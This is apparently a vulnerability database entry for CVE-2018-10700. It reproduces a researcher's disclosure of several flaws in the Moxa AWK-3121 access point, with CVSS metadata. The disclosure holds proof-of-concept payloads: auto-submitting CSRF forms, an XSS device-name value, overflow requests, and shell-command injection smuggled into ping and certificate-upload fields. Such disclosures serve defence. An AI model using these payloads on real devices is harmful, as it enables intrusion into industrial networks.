VAR-201906-0790

Vulnerability from variot - Updated: 2023-12-18 12:00

An issue was discovered on Moxa AWK-3121 1.19 devices. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The 'iw_board_deviceName' parameter in Moxa AWK-3121 version 1.19 has a cross-site scripting vulnerability. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.


[VulnerabilityType Other] HTTP traffic by default


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Information Disclosure] true


[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. It is intended that an administrator can download /systemlog.log (the system log).

[Additional Information] POC http://192.168.127.253//systemlog.log


[Vulnerability Type] Incorrect Access Control


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Information Disclosure] true


[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. The session cookie "Password508" does not have an HttpOnly flag.

[VulnerabilityType Other] Missing HttpOnly flag on session cookie


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Information Disclosure] true


[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.

[Additional Information] POC

POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0

srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp


[Vulnerability Type] Buffer Overflow


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Code execution] true


[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.

[VulnerabilityType Other] Open WiFi Connection


[Vendor of Product] Moxa


[Affected Product Code Base] AWK 3121 - 1.14


[Affected Component] Device


[Attack Type] Remote


[Impact Information Disclosure] true


[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.

[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f

server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)


[Vulnerability Type] Buffer Overflow


[Vendor of Product] Moxa


[Affected Product Code Base] AWK 3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Code execution] true


[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs.

[Additional Information] POC to change name of the device

<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html

<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html


[Vulnerability Type] Cross Site Request Forgery (CSRF)


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Code execution] true


[Impact Escalation of Privileges] true


[Impact Information Disclosure] true


[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.

[Additional Information] POC

POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333

srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp


[VulnerabilityType Other] Command injection in Ping functionality


[Vendor of Product] Moxa


[Affected Product Code Base] AWK 3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Code execution] true


[Attack Vectors] Use XSRF form to trick an admin into submitting the request


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.

[VulnerabilityType Other] Insecure service Telnet enabled by default


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Telnet daemon


[Attack Type] Remote


[Impact Code execution] true


[Impact Information Disclosure] true


[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.

[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562

... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"

;ping -c 9 192.168.127.103 ## ... 114782935826962 Content-Disposition: form-data; name="bkpath"

/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"

certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"

0 ... 114782935826962 Content-Disposition: form-data; name="Submit"

Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"

test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml

<a id="a"<b id="b"hey!</b</a ... 114782935826962--


[VulnerabilityType Other] Command injection in file upload


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Code execution] true


[Attack Vectors] Use XSRF form to trick an admin into submitting the request


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley


[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html


[Vulnerability Type] Cross Site Scripting (XSS)


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.9


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Code execution] true


[Impact Escalation of Privileges] true


[Impact Information Disclosure] true


[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley

  1. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.

[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec

... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream

ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"

tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"

ping -c 3 192.168.127.101 ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath"

/Troubleshooting.asp ... 7e21a62f2905ca--


[Vulnerability Type] Buffer Overflow


[Vendor of Product] Moxa


[Affected Product Code Base] AWK-3121 - 1.14


[Affected Component] Web Server -- iw_webs (Goahead)


[Attack Type] Remote


[Impact Code execution] true


[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow


[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm


[Discoverer] Samuel Huntley


[Additional Information] POC

<html <body <script function submitRequest() { var formData = new FormData();

formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##"); formData.append("iw_storage", "tftp"); formData.append("iw_serverip", "192.168.1.101"); formData.append("bkpath", "/wireless_cert.asp?index=1");

// HTML file input, chosen by user formData.append("certFile1", "test.txt");

// JavaScript file-like object var content = '<a id="a"<b id="b"hey!

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0790",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "awk-3121",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "moxa",
        "version": "1.19"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.19:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Samuel Huntley",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153223"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2018-10700",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2018-10700",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-120486",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2018-10700",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-10700",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201906-328",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-120486",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-10700",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-120486"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10700"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-015599"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10700"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-328"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on Moxa AWK-3121 1.19 devices. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter \"iw_board_deviceName\" is susceptible to this injection. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The \u0027iw_board_deviceName\u0027 parameter in Moxa AWK-3121 version 1.19 has a cross-site scripting vulnerability. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n  \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n  Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n  srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n  Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n  server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. However, this interface is not protected against\n CSRF attacks, which allows an attacker to trick an administrator into\n executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and\n forms/webSetMainRestart URIs. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n  \u003cbody\n   \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n    \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n    \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n    \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp          \" /\n   \u003c/form\n   \u003cscript\n   setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n   \u003c/script\n  \u003c/body\n \u003c/html\n \n \u003chtml\n  \u003cbody\n   \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n    \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n   \u003c/form\n   \u003cscript\n   setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n   \u003c/script\n  \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n  Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n  srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n 